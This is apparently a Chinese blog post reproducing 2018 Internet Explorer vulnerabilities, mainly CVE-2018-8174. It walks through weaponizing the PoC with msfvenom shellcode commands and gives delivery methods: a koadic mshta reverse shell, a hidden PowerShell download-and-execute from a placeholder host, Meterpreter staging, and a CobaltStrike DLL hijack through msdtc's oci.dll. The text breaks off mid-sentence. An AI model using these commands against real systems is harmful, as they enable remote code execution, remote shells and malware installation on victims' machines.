对 2018 年几个IE漏洞的复现与说明,之前复现的时候在仓库的文档中简单的说明了一下,以下是这几个漏洞的复现报告与一些基本的利用方法,这些漏洞或多或少都出现在 APT 攻击中,特别是 CVE-2018-8174
又称"双杀"漏洞而 8373 又被 Darkhotel 组织利用
以上对这三个漏洞进行复现, Poc 下载地址:
CVE-2018-8174
首先CVE-8174-8174
的原 PoC 中定义了一个Getshellcode
函数,此函数为漏洞利用的核心函数,其功能使用JS Unescape
函数对escape
函数编码的字符串进行解码。
其中解码的内容为 Shellcode
利用方法为 Msf 生成 shellcode 填充或使用自己的 shellcode 填充
Msf 命令如下:
msfvenom -p windows/exec cmd=calc.exe -f js_le exitfunc=thread -a x86
生成弹出计算器的 shellcode 然后填充到 Getshellcode 函数中
填充完后使用IE打开,成功弹出计算器。
则可使用以下几种方式
1、koadic 远控 mshta 功能反弹 shell
msfvenom -p windows/exec cmd="mshta koadic生成的地址" -f js_le exitfunc=thread
x64 位的:
msfvenom -p windows/x64/exec cmd="mshta koadic生成的地址" -f js_le exitfunc=thread
2、Powershell 下载执行
msfvenom -p windows/exec cmd="powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://xxx.xx.com/1.exe','C:WindowsTasks23.exe');start-process " -f js_le exitfunc=thread
3、使用MSF web_delivery 模块反弹(本质还是 Powershell)
4、当然还可以生成 Meterperter 的 shellcode 填充
建议使用 stage payload,stage 可以理解为将原来的全部攻击代码进行拆分,stage 先进行第一阶段的利用进行目标后再把剩余的 shellcode 加载过来, stage 的 payload 相对于原来较小
5、自己提取 shellcode 然后进行填充测试
填充自己的下载执行 sc 成功下载执行木马
特别的利用方法
可以使用msdtc
的 Dll 劫持漏洞,用CobaltStrike
生成恶意 Dll,然后下载到C:\windows\system32
目录下 DLL 名称为oci.dll
,使用msdtc
服
楼主残忍的关闭了评论